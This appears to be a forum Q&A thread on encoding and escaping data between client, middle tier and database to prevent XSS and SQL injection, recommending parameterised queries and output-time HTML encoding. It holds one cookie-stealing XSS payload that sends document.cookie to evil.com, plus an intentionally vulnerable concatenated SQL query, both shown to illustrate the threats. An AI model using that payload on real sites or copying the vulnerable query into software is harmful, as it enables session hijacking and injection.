HTML/AJAX Encoding & Security

Question 1

I'll answer your points in a different order than asked, as I think it will make more sense this way.

Upon receiving data from the client, the middle-tier should scrub it of obvious depravities (could anyone elaborate as to what this is? Or is this purely context-dependent?) a

Yes purely context dependent.

In a nutshell you should only encode when output (either to page or to another component where there is a change of language/protocol) - when dealing with values in memory you should be dealing with the raw values, unencoded.

The middle-tier receives data from the back-end, and... this is where I start getting confused (assuming that I'm even correct at earlier points in this). I believe that the general consensus is to assume the data is corrupt and terrible, so you... encode it again? But if it's already encoded, that leaves you with double-encoded data, which is just confusing.

When you retrieve data from the back-end you will usually retrieve it from the back-end in unencoded format (it will usually automatically be unencoded for you, but it can depend). This will mean that you are not double-encoding it.

On the client side, should anything be done?

If you are manipulating DOM objects using JavaScript then you still have to take care that nothing external to your page can alter the execution of your scripts to create an exploit. e.g. make sure anything written straight into HTML is correctly encoded, or if you're setting attributes where JavaScript can be inserted like onclick you may need to validate and reject dangerous data before it is output (or if you already knew this is where the data will end up beforehand, then you can validate it at the UI when the user can try again). This is because any JavaScript that runs on your website should be trusted not to do bad things, and allowing your script, albeit client-side, to be manipulated can lead to vulnerabilities. Bad things that can happen include sending your cookies to the attackers domain so they can use the session ID to hijack sessions <script>document.location.href = 'http://www.evil.com?' + escape(document.cookie);</script>

This exploit is called DOM Based XSS and you touched upon it when mentioning eval.

Encoding Example

A user enters some text into a text box and submits it to your web server, which you will later output.

When the middle tier receives it it would not need to encode anything as data can only be "corrupt and terrible" when put into context.

The middle tier would then ask the back end database to write it as a record. Using best practises it should do this using a parameterised query, which makes sure the values are strongly typed and that the query cannot be broken out of to cause SQL injection.

Pseudo code example:

command.query = "insert into mytable (mytext) values (?);";
command.parameters.add(inputText);

command.execute();

Now let us imagine we are using a database that doesn't have parameter support. Now our query would have to be as follows.

command.query = "insert into mytable (mytext) values ('" + inputText + "');";

However, this is vulnerable to SQL injection as a user can manipulate inputText to contain a single quote and change the context of inputText into another SQL command instead of just a value.

See here for a more thorough example: https://www.owasp.org/index.php/SQL_Injection

So to secure our free-text query we would have to correctly encode the inputText string for the context of our SQL server. Suppose we have a method named SqlEncode that will correctly convert the quote characters into their correct value (usually doubling quotes so ' becomes '').

So now our secure query is:

command.query = "insert into mytable (mytext) values ('" + SqlEncode(inputText) + "');";

So if someone entered O'leary as their word, the statement below would be executed.

insert into mytable (mytext) values ('O''leary');

Which our DB server would interpret as the value O'leary being inserted.

Now when we retrieve this value from the DB into our middle tier using a standard select, the raw value O'leary is retrieved and is stored in memory. Note that this is the unencoded version. If we were then to output it to a webpage, we should then HTML encode it to ensure all special HTML characters are transformed into their proper HTML representation. For example if our HTML encoding method encoded all non alpha-numerics (which is valid, if a little over kill) our output from the above would be O'leary. This is not important for characters such as the single quote in HTML (but it is for JavaScript!) but other HTML characters such as less than and greater than should definitely be encoded. For more details on HTML encoding, see here. It is often best to use encoding functions that already exist in your language rather than rolling your own as it is easy to overlook things that could lead to an exploit.

Question 2

I think you mean escaping, not encoding.

If you're using parameterized queries, you don't have to worry too much about escaping input from the user because the escaping will be done for you.

When reading data stored in the database (that was entered by the user), escape it so that users can't insert any HTML that they wish on a page. You should be the one to create all HTML tags, and fill in the escaped data from the database.

From client to web/application server, use SSL to prevent sniffing of credentials, sessions, and private information.